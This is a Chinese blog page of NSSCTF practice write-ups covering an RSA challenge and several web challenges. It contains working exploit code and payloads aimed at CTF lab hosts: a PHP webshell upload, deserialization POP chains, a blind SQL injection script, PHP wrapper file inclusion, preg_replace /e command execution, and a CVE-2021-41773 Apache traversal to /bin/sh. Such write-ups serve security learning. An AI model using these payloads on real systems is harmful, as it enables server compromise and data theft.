<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, shrink-to-fit=no">
    <meta name="referrer" content="origin">
    <meta http-equiv="Cache-Control" content="no-transform">
    <meta http-equiv="Cache-Control" content="no-siteapp">
    <title>
        
            NSSCTF练习
        
    </title>
    <link rel="shortcut icon" href="#"/>

    <link type="text/css" rel="stylesheet" href="/font/LongCang.css">
    <link type="text/css" rel="stylesheet" href="/font/Monda.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSansSC.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSerifSC.css">
    <link type="text/css" rel="stylesheet" href="/font/Playball.css">
    <link type="text/css" rel="stylesheet" href="/font/PTMono.css">
    <link type="text/css" rel="stylesheet" href="/font/Roboto.css">
    <link type="text/css" rel="stylesheet" href="/font/RobotoSlab.css">
    <link type="text/css" rel="stylesheet" href="/font/Rosario.css">
    <link type="text/css" rel="stylesheet" href="/font/UbuntuMono.css">

    <link type="text/css" rel="stylesheet" href="/css/base.css">
    <link type="text/css" rel="stylesheet" href="/css/code.css">

    <script type="text/javascript" src="/js/jquery-3.4.1.min.js"></script>
<meta name="generator" content="Hexo 6.3.0"></head>
<body>
    <a id="cover"></a>
    <link type="text/css" rel="stylesheet" href="/css/post.css">
<div id="header" class="header">
    <div class="vertical">
        <div class="inner">
            
                <h1 class="header-subtitle">NSSCTF练习</h1>
                <div class="header-subinfo">
                    <p class="article-info-text">
                        <span>
                            <i class="iconfont icon-time"></i> 发表时间：2023-03-09
                        </span>
                        
                            <span id="/2023/03/09/CTF练习/" class="leancloud_visitors" data-flag-title="NSSCTF练习">
                                <i class="iconfont icon-browse"></i> 阅读：<sapn class="leancloud-visitors-count"></span>
                            </span>
                        
                        <span>
                            <i class="iconfont icon-interactive"></i> 评论：<span class="valine-comment-count" data-xid="/2023/03/09/CTF练习/"></span>
                        </span>  
                    </p>
                    
                    
                        
                            <span class="tag-color">刷题</span>
                        
                    
                </div>
            
        </div>
    </div>
    
</div>
<div id="container">
    
        <!-- 文章页面 -->
        <div id="article">
            <div class="toc"></div>
            <div class="article-body">
                <h3 id="crypto"><a href="#crypto" class="headerlink" title="crypto"></a>crypto</h3><h4 id="HDCTF-2023-Normal-Rsa"><a href="#HDCTF-2023-Normal-Rsa" class="headerlink" title="[HDCTF 2023]Normal_Rsa"></a>[HDCTF 2023]Normal_Rsa</h4><p>两次低加密指数攻击(e很小)攻击得到p和q和r</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">from Crypto.Util.number import *</span><br><span class="line">#from shin import flag</span><br><span class="line"></span><br><span class="line">m=bytes_to_long(b&#x27;HDCTF&#123;0b3663ed-67e4-44e2-aee7-7c2d8665b63c&#125;&#x27;)</span><br><span class="line">e=65537</span><br><span class="line">p=getPrime(256)</span><br><span class="line">#q=getPrime(512)</span><br><span class="line">q=6704006258427795304220450411280948926213189680360135534636452074716135019217911134480777251273836898349926894302122011679095979445240343891749741039976761</span><br><span class="line">r=getPrime(512)</span><br><span class="line">n=p*q*r  # r = 8673707372360903001769584967702576182461806099875475592231780435620244466470727810622624907205680103734491065123362989305732038702739316976664597710959103</span><br><span class="line">P=pow(p,2,n) # p = 82299742973143843477690602529772556797553191731450056154147192732024307907649</span><br><span class="line">Q=pow(q,2,n) # q = 6704006258427795304220450411280948926213189680360135534636452074716135019217911134480777251273836898349926894302122011679095979445240343891749741039976761</span><br><span class="line">c=pow(m,e,n)</span><br><span class="line">print(f&quot;P = &#123;P&#125;&quot;)</span><br><span class="line">print(f&quot;Q = &#123;Q&#125;&quot;)</span><br><span class="line">print(f&quot;n = &#123;n&#125;&quot;)</span><br><span class="line">print(f&quot;c = &#123;c&#125;&quot;)</span><br><span class="line">&#x27;&#x27;&#x27;</span><br><span class="line">P = 6773247693445539441213578786581644136043035242620265251725630106817272212428325283262417364786451280269516220237289567904055371962564710888510272312707201</span><br><span class="line">Q = 44943699913039047357456835559925378512493523252980366265686899925123157887149890185055864945749408514100461655676474535153113631214288057465776668291975220848776401405531599573114898492452990847774628035552581539370236080368457643523158920565504112005843410442573511095306233906498204203659537135943420051121</span><br><span class="line">n = 4785613888465991171479248142015453309149548888755453367991501772592797686075465426815591528773123474962122102667475893532087343900904799831474817826058951265607078893487357878501280782935653048309499430170214015422492927323961394806106719569168457890040223027119115392961801582406287167644266319898276785787730947633037300317098453409851410936140488150390919951503767522517809035474567</span><br><span class="line">c = 2247027561636791381460194811205520085150851211795956750955965051548230844233212462525163107917067768507367576366327035846089534916090521357212722275045521111077106695721780943857231570836500588468487620819893688830570842176795906808347617421353983094639290979158413935035603633331786978227439155042365130799647385116773171906670409535157184391352888875130028955334874727206292146950544</span><br><span class="line">&#x27;&#x27;&#x27;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="web"><a href="#web" class="headerlink" title="web"></a>web</h3><h4 id="WUSTCTF-2020-CV-Maker"><a href="#WUSTCTF-2020-CV-Maker" class="headerlink" title="[WUSTCTF 2020]CV Maker"></a>[WUSTCTF 2020]CV Maker</h4><p>先随便建一个号，登进去<br><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240414203401.png" alt="20240414203401"></p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240414203418.png" alt="20240414203418"></p>
<p>文件上传</p>
<p>随便修改点头像上传上去</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240414203900.png" alt="20240414203900"></p>
<p>有一个是否是图片的检测，burp抓包，加上图片<code>GIF89a</code></p>
<p>传一个一句话木马，修改为.php的后缀，直接没有后缀过滤，直接上传成功</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240414204657.png" alt="20240414204657"></p>
<p>现在就是获取图片位置</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240414205028.png" alt="20240414205028"></p>
<p>查看页面源码，直接可以看到图片位置</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240414205459.png" alt="20240414205459"></p>
<p>本来还想省一步蚁剑，但是直接找不到flag</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240414210101.png" alt="20240414210101"></p>
<p>发现在环境变量里面</p>
<h4 id="NISACTF-2022-popchains"><a href="#NISACTF-2022-popchains" class="headerlink" title="[NISACTF 2022]popchains"></a>[NISACTF 2022]popchains</h4><p>源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line">Happy New Year~ MAKE A WISH</span><br><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">echo &#x27;Happy New Year~ MAKE A WISH&lt;br&gt;&#x27;;</span><br><span class="line"></span><br><span class="line">if(isset($_GET[&#x27;wish&#x27;]))&#123;</span><br><span class="line">    @unserialize($_GET[&#x27;wish&#x27;]);</span><br><span class="line">&#125;</span><br><span class="line">else&#123;</span><br><span class="line">    $a=new Road_is_Long;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">/***************************pop your 2022*****************************/</span><br><span class="line"></span><br><span class="line">class Road_is_Long&#123;</span><br><span class="line">    public $page;</span><br><span class="line">    public $string;</span><br><span class="line">    public function __construct($file=&#x27;index.php&#x27;)&#123;</span><br><span class="line">        $this-&gt;page = $file;</span><br><span class="line">    &#125;</span><br><span class="line">    public function __toString()&#123;</span><br><span class="line">        return $this-&gt;string-&gt;page;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function __wakeup()&#123;</span><br><span class="line">        if(preg_match(&quot;/file|ftp|http|https|gopher|dict|\.\./i&quot;, $this-&gt;page)) &#123;</span><br><span class="line">            echo &quot;You can Not Enter 2022&quot;;</span><br><span class="line">            $this-&gt;page = &quot;index.php&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class Try_Work_Hard&#123;</span><br><span class="line">    protected  $var;</span><br><span class="line">    public function append($value)&#123;</span><br><span class="line">        include($value);</span><br><span class="line">    &#125;</span><br><span class="line">    public function __invoke()&#123;</span><br><span class="line">        $this-&gt;append($this-&gt;var);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class Make_a_Change&#123;</span><br><span class="line">    public $effort;</span><br><span class="line">    public function __construct()&#123;</span><br><span class="line">        $this-&gt;effort = array();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function __get($key)&#123;</span><br><span class="line">        $function = $this-&gt;effort;</span><br><span class="line">        return $function();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">/**********************Try to See flag.php*****************************/</span><br></pre></td></tr></table></figure>

<p>poc</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">class Road_is_Long&#123;</span><br><span class="line">    public $page;</span><br><span class="line">    public $string;</span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line">class Try_Work_Hard&#123;</span><br><span class="line">    protected  $var = &quot;/flag&quot;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class Make_a_Change&#123;</span><br><span class="line">    public $effort ;</span><br><span class="line">   </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$a = new Road_is_Long();</span><br><span class="line">$a-&gt;page = $a;</span><br><span class="line">$a-&gt;string = new Make_a_Change();</span><br><span class="line">$c = new Try_Work_Hard();</span><br><span class="line">$a-&gt;string-&gt;effort = $c;</span><br><span class="line">echo urlencode(serialize($a));</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h4 id="CISCN-2019华北Day2-Web1"><a href="#CISCN-2019华北Day2-Web1" class="headerlink" title="[CISCN 2019华北Day2]Web1"></a>[CISCN 2019华北Day2]Web1</h4><p>抓包，fuzz<br><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20230524214503.png" alt="20230524214503"></p>
<p>直接打一个<code>1</code>出现<code>Hello, glzjin wants a girlfriend.</code>,<code>-1</code>出现<code>Error Occured When Fetch Result.</code><br><code>ascii</code> <code>()</code> <code>substr</code> <code>select</code> <code>from</code>可以用，直接盲注</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">import time </span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url = &#x27;http://node2.anna.nssctf.cn:28550/index.php&#x27;</span><br><span class="line">flag = &#x27;&#x27;</span><br><span class="line"></span><br><span class="line">for i in range(1,200):</span><br><span class="line">    low = 32</span><br><span class="line">    high = 127</span><br><span class="line">    mid = (low + high) // 2</span><br><span class="line">    while low &lt; high :</span><br><span class="line">        payload =  &quot;(ascii(substr((select(flag)from(flag)),&#123;&#125;,1))&gt;&#123;&#125;)&quot;.format(i,mid)</span><br><span class="line">        post = &#123;&quot;id&quot;:payload&#125;</span><br><span class="line">        r = requests.post(url=url,data=post)</span><br><span class="line">        if &quot;Hello&quot; in r.text:</span><br><span class="line">            low = mid + 1</span><br><span class="line">        else :</span><br><span class="line">            high = mid </span><br><span class="line">        mid = (low + high) // 2</span><br><span class="line">    flag+=chr(mid)</span><br><span class="line">    print(flag)</span><br><span class="line">    time.sleep(0.3)</span><br><span class="line">    if mid &lt;= 32 or mid &gt;=127 :</span><br><span class="line">        break </span><br></pre></td></tr></table></figure>
<p>爆出flag<code>NSSCTF&#123;625f55b2-39da-493e-b1b0-9365d41d0888&#125;</code></p>
<h4 id="HNCTF-2022-WEEK2-easy-unser"><a href="#HNCTF-2022-WEEK2-easy-unser" class="headerlink" title="[HNCTF 2022 WEEK2]easy_unser"></a>[HNCTF 2022 WEEK2]easy_unser</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">    include &#x27;f14g.php&#x27;;</span><br><span class="line">    error_reporting(0);</span><br><span class="line"></span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">    class body&#123;</span><br><span class="line"></span><br><span class="line">    private $want,$todonothing = &quot;i can&#x27;t get you want,But you can tell me before I wake up and change my mind&quot;;</span><br><span class="line"></span><br><span class="line">    public function  __construct($want)&#123;</span><br><span class="line">        $About_me = &quot;When the object is created,I will be called&quot;;</span><br><span class="line">        if($want !== &quot; &quot;) $this-&gt;want = $want;</span><br><span class="line">        else $this-&gt;want = $this-&gt;todonothing;</span><br><span class="line">    &#125;</span><br><span class="line">    function __wakeup()&#123;</span><br><span class="line">        $About_me = &quot;When the object is unserialized,I will be called&quot;;</span><br><span class="line">        $but = &quot;I can CHANGE you&quot;;</span><br><span class="line">        $this-&gt; want = $but;</span><br><span class="line">        echo &quot;C1ybaby!&quot;;</span><br><span class="line">        </span><br><span class="line">    &#125;</span><br><span class="line">    function __destruct()&#123;</span><br><span class="line">        $About_me = &quot;I&#x27;m the final function,when the object is destroyed,I will be called&quot;;</span><br><span class="line">        echo &quot;So,let me see if you can get what you want\n&quot;;</span><br><span class="line">        if($this-&gt;todonothing === $this-&gt;want)</span><br><span class="line">            die(&quot;鲍勃,别傻愣着!\n&quot;);</span><br><span class="line">        if($this-&gt;want == &quot;I can CHANGE you&quot;)</span><br><span class="line">            die(&quot;You are not you....&quot;);</span><br><span class="line">        if($this-&gt;want == &quot;f14g.php&quot; OR is_file($this-&gt;want))&#123;</span><br><span class="line">            die(&quot;You want my heart?No way!\n&quot;);</span><br><span class="line">        &#125;else&#123;</span><br><span class="line">            echo &quot;You got it!&quot;;</span><br><span class="line">            highlight_file($this-&gt;want);</span><br><span class="line">            &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">    class unserializeorder&#123;</span><br><span class="line">        public $CORE = &quot;人类最大的敌人,就是无序. Yahi param vaastavikta hai!&lt;BR&gt;&quot;;</span><br><span class="line">        function __sleep()&#123;</span><br><span class="line">            $About_me = &quot;When the object is serialized,I will be called&quot;;</span><br><span class="line">            echo &quot;We Come To HNCTF,Enjoy the ser14l1zti0n &lt;BR&gt;&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">        function __toString()&#123;</span><br><span class="line">            $About_me = &quot;When the object is used as a string,I will be called&quot;;</span><br><span class="line">            return $this-&gt;CORE;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    $obj = new unserializeorder();</span><br><span class="line">    echo $obj;</span><br><span class="line">    $obj = serialize($obj);</span><br><span class="line">    </span><br><span class="line"></span><br><span class="line">    if (isset($_GET[&#x27;ywant&#x27;]))</span><br><span class="line">    &#123;</span><br><span class="line">        $ywant = @unserialize(@$_GET[&#x27;ywant&#x27;]);</span><br><span class="line">        echo $ywant;</span><br><span class="line">    &#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>exp</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class body&#123;</span><br><span class="line">    public $todonothing=&#x27;123&#x27;;</span><br><span class="line">    public $want=&#x27;php://filter/resource=f14g.php&#x27;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$a=new body;</span><br><span class="line">echo (serialize($a));</span><br><span class="line">echo urlencode(&#x27;O:4:&quot;body&quot;:3:&#123;s:11:&quot;todonothing&quot;;s:3:&quot;123&quot;;s:4:&quot;want&quot;;s:30:&quot;php://filter/resource=f14g.php&quot;;&#125;&#x27;)#绕过weak_up</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<h4 id="knowledge"><a href="#knowledge" class="headerlink" title="knowledge"></a>knowledge</h4><p><code>is_file()</code>伪协议绕过<br><code>php://filter/resource=f14g.php</code><br><code>php://filter/read=convert.base64-encode/resource=phpinfo.php</code></p>
<h4 id="BJDCTF-2020-easy-md5"><a href="#BJDCTF-2020-easy-md5" class="headerlink" title="[BJDCTF 2020]easy_md5"></a>[BJDCTF 2020]easy_md5</h4><p>开始就给一个输入框没测出；直接开扫，就扫到一个&#x2F;flag.php也没东西；看了一下wp；burp抓一下包看到hint</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20231221142923.png" alt="20231221142923"></p>
<p><code>select * from &#39;admin&#39; where password=md5($pass,true)</code></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/March97/article/details/81222922">具体原理借鉴文章</a></p>
<p>来看一下md5这个函数，默认不写为FALSE。32位16进制的字符串；TRUE。16位原始二进制格式的字符串<br>在mysql里面，在用作布尔型判断时，以1开头的字符串会被当做整型数。要注意的是这种情况是必须要有单引号括起来的，比如password&#x3D;’xxx’or’1xxxxxxxxx’，那么就相当于password&#x3D;’xxx’ or 1  ，也就相当于password&#x3D;’xxx’ or true，所以返回值就是true。</p>
<p>发现这个字符串是有可能出现特殊字符的，所以只要构建出<code>&#39;or&#39;数字...&#39;</code>就可以，可以自己试着写一个脚本去爆破这样的字符串<br>我这里写了一个，非常大，非常难跑</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">// 正则匹配字符串前五个字符为&#x27;or&#x27;加数字，且最后一个字符为&#x27;</span><br><span class="line">$pattern = &quot;/^&#x27;or&#x27;\d\&#x27;$/&quot;;</span><br><span class="line"></span><br><span class="line">for($i=1; $i&lt;=9; $i++) &#123;</span><br><span class="line">    $length = pow(26, $i);</span><br><span class="line">    for($j=0; $j&lt;$length; $j++) &#123;</span><br><span class="line">      $str = &#x27;&#x27;;</span><br><span class="line">      for($k=0; $k&lt;$i; $k++) &#123;</span><br><span class="line">        $str .= chr(ord(&#x27;a&#x27;) + floor($j / pow(26, $k)) % 26);</span><br><span class="line">      &#125;</span><br><span class="line">    $ma5_string = md5($str,true);</span><br><span class="line">    if (preg_match($pattern, $ma5_string)) &#123;</span><br><span class="line">        echo $str;</span><br><span class="line">        echo &quot;匹配成功&quot;;</span><br><span class="line">        die;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        echo &quot;匹配失败&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">      echo $str.&quot;\n&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>这里直接有一个<code>ffifdyop</code></p>
<p>这里直接源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$a = $GET[&#x27;a&#x27;];</span><br><span class="line">$b = $_GET[&#x27;b&#x27;];</span><br><span class="line"></span><br><span class="line">if($a != $b &amp;&amp; md5($a) == md5($b))&#123;</span><br><span class="line">    header(&#x27;Location: levell14.php&#x27;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>直接数组绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">include &quot;flag.php&quot;;</span><br><span class="line"></span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">if($_POST[&#x27;param1&#x27;]!==$_POST[&#x27;param2&#x27;]&amp;&amp;md5($_POST[&#x27;param1&#x27;])===md5($_POST[&#x27;param2&#x27;]))&#123;</span><br><span class="line">    echo $flag;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>再一次数组绕过<br>拿到flag</p>
<ul>
<li>修复方案</li>
</ul>
<p>可以把直接使用md5，不加true</p>
<h4 id="BJDCTF-2020-ZJCTF，不过如此"><a href="#BJDCTF-2020-ZJCTF，不过如此" class="headerlink" title="[BJDCTF 2020]ZJCTF，不过如此"></a>[BJDCTF 2020]ZJCTF，不过如此</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">$text = $_GET[&quot;text&quot;];</span><br><span class="line">$file = $_GET[&quot;file&quot;];</span><br><span class="line">if(isset($text)&amp;&amp;(file_get_contents($text,&#x27;r&#x27;)===&quot;I have a dream&quot;))&#123;</span><br><span class="line">    echo &quot;&lt;br&gt;&lt;h1&gt;&quot;.file_get_contents($text,&#x27;r&#x27;).&quot;&lt;/h1&gt;&lt;/br&gt;&quot;;</span><br><span class="line">    if(preg_match(&quot;/flag/&quot;,$file))&#123;</span><br><span class="line">        die(&quot;Not now!&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    include($file);  //next.php</span><br><span class="line">&#125;</span><br><span class="line">else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>php伪协议</p>
<p><code>http://node4.anna.nssctf.cn:28318/?text=data://text/plain,I have a dream&amp;file=php://filter/read=convert.base64-encode/resource=next.php</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$id = $_GET[&#x27;id&#x27;];</span><br><span class="line">$_SESSION[&#x27;id&#x27;] = $id;</span><br><span class="line"></span><br><span class="line">function complex($re, $str) &#123;</span><br><span class="line">    return preg_replace(</span><br><span class="line">        &#x27;/(&#x27; . $re . &#x27;)/ei&#x27;,</span><br><span class="line">        &#x27;strtolower(&quot;\\1&quot;)&#x27;,</span><br><span class="line">        $str</span><br><span class="line">    );</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">foreach($_GET as $re =&gt; $str) &#123;</span><br><span class="line">    echo complex($re, $str). &quot;\n&quot;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function getFlag()&#123;</span><br><span class="line">	@eval($_GET[&#x27;cmd&#x27;]);</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2557">先知详解</a><br>payload<br><code>http://node4.anna.nssctf.cn:28318/next.php?\S*=$&#123;phpinfo()&#125;</code>这个应该是非预期<br>预期应该是先调用getFlag()再传cmd<br><code>http://node4.anna.nssctf.cn:28318/next.php?\S*=$&#123;getFlag()&#125;&amp;cmd=system(%27env%27);</code></p>
<h4 id="NSSRound-4-SWPU-ez-rce"><a href="#NSSRound-4-SWPU-ez-rce" class="headerlink" title="[NSSRound#4 SWPU]ez_rce"></a>[NSSRound#4 SWPU]ez_rce</h4><p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240414192807.png" alt="20240414192807"></p>
<p>什么都没给，看一下框架</p>
<p>apache2.4.49有目录穿越漏洞</p>
<blockquote>
<p>CVE-2021-41773</p>
</blockquote>
<p><code>/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh</code><br>如果服务端开启了cgi或cgid这两个mod的情况下，这个路径穿越漏洞将可以执行任意命令</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240414192947.png" alt="20240414192947"></p>
<p>给我们整了一堆文件夹，爆破一下</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240414194335.png" alt="20240414194335"></p>
<p>数字0-9爆破</p>
<p>出flag</p>
<p><img src="https://cdn.jsdelivr.net/gh/Daylovef/image/image/dongman/20240414194545.png" alt="20240414194545"></p>
